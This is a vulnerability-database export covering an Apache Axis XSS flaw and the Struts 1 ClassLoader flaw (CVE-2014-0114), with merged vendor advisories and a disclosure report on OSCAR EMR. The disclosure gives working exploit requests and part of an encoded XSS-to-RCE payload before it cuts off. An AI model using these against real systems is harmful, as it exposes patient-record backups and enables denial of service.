"version": "8.1.1"
},
{
"model": "financial services compliance regulatory reporting",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"model": "knowledge",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.6.3"
},
{
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "communications network integrity",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.6"
},
{
"model": "axis",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "1.4 for up to 1.x"
},
{
"model": "axis",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "1.2"
},
{
"model": "axis",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "1.1"
},
{
"model": "axis",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "1.0"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apache:axis",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
}
]
},
"cve": "CVE-2018-8032",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-8032",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-138064",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-8032",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-8032",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-8032",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-8032",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201808-082",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-138064",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-8032",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-138064"
},
{
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services. Apache Axis is an open source, XML-based Web service architecture of the Apache Software Foundation in the United States. It includes SOAP servers implemented in Java and C++ languages, as well as various public services and APIs to generate and deploy Web services. application. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-8032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "VULHUB",
"id": "VHN-138064"
},
{
"db": "VULMON",
"id": "CVE-2018-8032"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-8032",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2023.3781",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3943",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-138064",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-8032",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-138064"
},
{
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"id": "VAR-201808-1040",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-138064"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T20:57:52.403000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AXIS-2924",
"trust": 0.8,
"url": "https://issues.apache.org/jira/browse/AXIS-2924"
},
{
"title": "[jira] [Created] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"trust": 0.8,
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060@Atlassian.JIRA%3E"
},
{
"title": "Apache Axis Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=82812"
},
{
"title": "Debian CVElist Bug Report Logs: axis: CVE-2018-8032: cross-site scripting (XSS) attack in the default servlet/services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=468f0b8a0724ba487c205868e0aa4a1a"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/khulnasoft-labs/awesome-security "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/PoC-in-GitHub "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-138064"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://issues.apache.org/jira/browse/axis-2924"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html"
},
{
"trust": 1.0,
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3cjira.13170716.1531060536000.93536.1531060560060%40atlassian.jira%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b%40%3cjava-dev.axis.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041%40%3cjava-dev.axis.apache.org%3e"
},
{
"trust": 0.8,
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3cjira.13170716.1531060536000.93536.1531060560060@atlassian.jira%3e"
},
{
"trust": 0.8,
"url": "https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041@%3cjava-dev.axis.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b@%3cjava-dev.axis.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8032"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-8032"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1146424"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3781"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-found-in-axis-jar-v1-x-may-affect-ibm-content-collector-for-sap-applications/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3943"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=905328"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=58641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/nomi-sec/poc-in-github"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-138064"
},
{
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-138064"
},
{
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-02T00:00:00",
"db": "VULHUB",
"id": "VHN-138064"
},
{
"date": "2018-08-02T00:00:00",
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"date": "2018-10-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"date": "2018-08-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"date": "2018-08-02T13:29:00.363000",
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-11-17T00:00:00",
"db": "VULHUB",
"id": "VHN-138064"
},
{
"date": "2022-07-25T00:00:00",
"db": "VULMON",
"id": "CVE-2018-8032"
},
{
"date": "2018-10-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-008731"
},
{
"date": "2023-07-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201808-082"
},
{
"date": "2024-11-21T04:13:08.053000",
"db": "NVD",
"id": "CVE-2018-8032"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Axis Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008731"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201808-082"
}
],
"trust": 0.6
}
}
var-201404-0288
Vulnerability from variot
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.
Security Fix(es):
-
Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
-
thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands (CVE-2016-5397)
-
slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)
-
jolokia: JMX proxy mode vulnerable to remote code execution (CVE-2018-1000130)
-
bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data (CVE-2016-1000338)
-
bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)
-
bouncycastle: Information exposure in DSA signature generation via timing attack (CVE-2016-1000341)
-
bouncycastle: ECDSA improper validation of ASN.1 encoding of signature (CVE-2016-1000342)
-
bouncycastle: DHIES implementation allowed the use of ECB mode (CVE-2016-1000344)
-
bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack (CVE-2016-1000345)
-
bouncycastle: Other party DH public keys are not fully validated (CVE-2016-1000346)
-
bouncycastle: ECIES implementation allowed the use of ECB mode (CVE-2016-1000352)
-
async-http-client: Invalid URL parsing with '?' (CVE-2017-14063)
-
undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service (CVE-2018-1114)
-
spring-framework: Directory traversal vulnerability with static resources on Windows filesystems (CVE-2018-1271)
-
tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service (CVE-2018-1338)
-
tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service (CVE-2018-1339)
-
pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF (CVE-2018-8036)
-
jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)
-
bouncycastle: flaw in the low-level interface to RSA key pair generator (CVE-2018-1000180)
-
bouncycastle: Carry propagation bug in math.raw.Nat??? class (CVE-2016-1000340)
-
bouncycastle: DSA key pair generator generates a weak private key by default (CVE-2016-1000343)
-
spring-framework: Multipart content pollution (CVE-2018-1272)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat would like to thank Chris McCown for reporting CVE-2018-8088.
Installation instructions are located in the download section of the customer portal. Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with '?' 1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands 1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution 1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution 1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet 1564408 - CVE-2018-1272 spring-framework: Multipart content pollution 1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems 1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service 1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service 1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service 1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator 1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data 1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode 1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack 1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated 1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode 1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? class 1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class 1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack 1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature 1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default 1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF
- Summary:
Fuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security update that addresses one security issue, is now available from the Red Hat Customer Portal. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)
Refer to the readme.txt file included with the patch files for installation instructions.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html
Updated Packages:
Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System."
Timeline:
29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.
An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:
var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr